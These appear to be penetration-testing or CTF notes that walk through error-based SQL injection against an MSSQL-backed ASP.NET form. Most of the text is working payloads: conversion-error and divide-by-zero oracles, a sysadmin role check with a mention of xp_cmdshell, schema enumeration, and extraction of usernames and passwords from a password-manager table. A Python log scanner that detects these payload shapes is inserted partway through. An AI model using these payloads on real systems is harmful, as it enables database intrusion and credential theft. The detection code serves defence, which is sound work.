# ERROR BASED

There is a form. It is vulnerable to SQL injection.

```
' - Error
'' - Error disappears
```

<https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors>

<https://portswigger.net/web-security/sql-injection/cheat-sheet>

It should be MSSQL, since the backend is an ASP.NET web service. Try that.

Test string concatenation (MSSQL syntax):

```
'+(SELECT '')+'
```

You can also exploit this behavior to test conditions.

```
'+(SELECT CASE WHEN (1=2) THEN 1/0 ELSE NULL END)+'
```

We can see the error page, so we can use conversion errors instead of time-based techniques.

<https://ozguralp.medium.com/turning-blind-error-based-sql-injection-into-an-exploitable-boolean-one-85d6be3ca23b>

```
'+convert(int,db_name())+'  ERROR
'+convert(char,db_name())+'  OK

'+convert(char,(SELECT IIF(SUBSTRING(DB_NAME(),1,1)='A',3,@@VERSION)))+'
```

This query works as follows:

* Substring the database name starting from the 1st character with length 1 and compare it with the character 'A'.
* If that character equals 'A', it returns the integer 3.
* Converting the integer 3 to char succeeds and returns without any error, meaning the condition is true.
* If the character does not equal 'A', it returns @@VERSION instead.
* Converting the @@VERSION result to char fails and returns an error (the Error.aspx page), meaning the condition is false.
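As an added defender-side example (not code from the lab or from the write-ups linked here), the following Python flags the payload shapes used in these notes when they show up in web-server access logs; the log format, paths and addresses are constructed and assumed.

```python
import re
from urllib.parse import unquote

# Added detection helper for these notes (not code from the lab or the linked write-ups).
# It looks for the MSSQL error-based oracle shapes used above in web-server access logs.
WS = r"[\s+]*"  # '+' may be an encoded space or the T-SQL concat operator; accept both
SIGNATURES = {
    "concat_probe":   re.compile(r"'\+\(" + WS + "select" + WS + "''" + WS + r"\)\+'", re.I),
    "divzero_oracle": re.compile(r"\bcase" + WS + r"when\b.*?\bthen" + WS + "1/0", re.I),
    "convert_probe":  re.compile(r"\bconvert\(" + WS + "(int|char)" + WS + ",", re.I),
    "iif_substring":  re.compile(r"\biif\(" + WS + r"substring\(", re.I),
    "schema_enum":    re.compile(r"information_schema\.(tables|columns)|\.\.sys(columns|objects)", re.I),
}
# Assumed combined log format: ip ident user [ts] "METHOD url proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(url):
    # sorted names of the signatures that match the percent-decoded URL
    decoded = unquote(url)  # %2b -> '+', %20 -> ' ', %3d -> '='; a literal '+' is kept
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(lines):
    # (ip, status, signatures) for every request matching at least one signature
    findings = []
    for m in filter(None, map(LOG_RE.match, lines)):
        hits = classify_request(m["url"])
        if hits:
            findings.append((m["ip"], int(m["status"]), hits))
    return findings

def summarize(findings):
    # per source IP: oracle-shaped requests, and how many of them hit the error page (5xx)
    summary = {}
    for ip, status, _ in findings:
        entry = summary.setdefault(ip, {"requests": 0, "errors": 0})
        entry["requests"] += 1
        entry["errors"] += status >= 500
    return summary

# Constructed sample log (RFC 5737 addresses); the payloads mirror the ones in these notes.
SAMPLE_LOG = [
    "192.0.2.10 - - [10/Oct/2024:13:55:40 +0000] \"GET /s.aspx?q=a'%2b(SELECT%20'')%2b' HTTP/1.1\" 200 2048",
    "192.0.2.10 - - [10/Oct/2024:13:55:43 +0000] \"GET /s.aspx?q=a'%2b(SELECT%20CASE%20WHEN%20(1%3d2)%20THEN%201/0%20ELSE%20NULL%20END)%2b' HTTP/1.1\" 200 2048",
    "192.0.2.10 - - [10/Oct/2024:13:55:45 +0000] \"GET /s.aspx?q=a'%2bconvert(char,(SELECT%20IIF(SUBSTRING(DB_NAME(),1,1)%3d'A',3,@@VERSION)))%2b' HTTP/1.1\" 500 512",
    "192.0.2.10 - - [10/Oct/2024:13:55:50 +0000] \"GET /s.aspx?q=a'%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))%2b' HTTP/1.1\" 500 512",
    "198.51.100.7 - - [10/Oct/2024:13:56:01 +0000] \"GET /s.aspx?q=convertible+cars HTTP/1.1\" 200 4096",
]

if __name__ == "__main__":
    print(summarize(scan_log(SAMPLE_LOG)))
```

A source that alternates between the error page and normal responses while sending these shapes is the boolean oracle from the write-up above being walked character by character.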

```
'+convert(char,(SELECT IIF(SUBSTRING(HOST_NAME(),1,1)='A',3,@@VERSION)))+'

Microsoft SQL Server 2017 (RTM)
```

```
%2bconvert(char,(SELECT IIF(SUBSTRING((***query_here***),1,1)='d',3,@@VERSION)))%2b

'+convert(char,(SELECT IIF(SUBSTRING((select top 1 table_name from INFORMATION_SCHEMA.tables),1,1)='A',3,@@VERSION)))+'
```

<https://www.exploit-db.com/papers/12975>

```
'+convert(int,(user_name()))+' - testuser

'+(SELECT CASE WHEN (is_srvrolemember('sysadmin', 'testuser')=0) THEN 1/0 ELSE NULL END)+' - Nope 

'+(SELECT CASE WHEN (is_srvrolemember('sysadmin')=1) THEN 1/0 ELSE NULL END)+' - True
```

:( - If it is equal to 1, we should be able to run `xp_cmdshell`. Still, we could not execute the command anyway.

<https://infosecwriteups.com/exploiting-error-based-sql-injections-bypassing-restrictions-ed099623cd94>

```
'+(convert(int,(select top 1 table_name from information_schema.tables)))+'
```

The above query retrieves the first `table_name` from the database; the conversion error returns it:

```
Conversion failed when converting the nvarchar value 'users' to data type int.
```

If that is not a useful table, exclude it and keep going until a proper table name shows up:

```
convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Download_Document','login_audit')))
```

```
'+convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))+'

'+convert(int,(select top 1 column_name from information_schema.columns where column_name not in ('col1','col2','col3')))+'

'+convert(int,(select top 1 username from users))+'

'+convert(int,(select top 1 username from users where username not in ('user1','user2')))+'
```

#### Different Approach

<https://github.com/shauntdergrigorian/CTF-Notes>

```
'+convert(int,(SELECT top 1 DB_NAME(6)))+'

archive
```

Enumerate other databases with `DB_NAME(i)`; here only 0<i<7 returns without an error.

```
'+convert(int,(Select top 1 name from archive..syscolumns))+'

'+convert(int,(Select top 1 name from archive..syscolumns where name not in ('alogin','id','psw')))+'

'+convert(int,(SELECT top 1 alogin FROM archive..pmanager where alogin not in ('REDACTED', 'REDACTED','REDACTED','REDACTED')))+'

'+convert(int,(SELECT top 1 psw FROM archive..pmanager where psw not in ('REDACTED','REDACTED','REDACTED','REDACTED')))+'

'+convert(int,(select top 1 column_name from archive..pmanager.alogin))+'
```
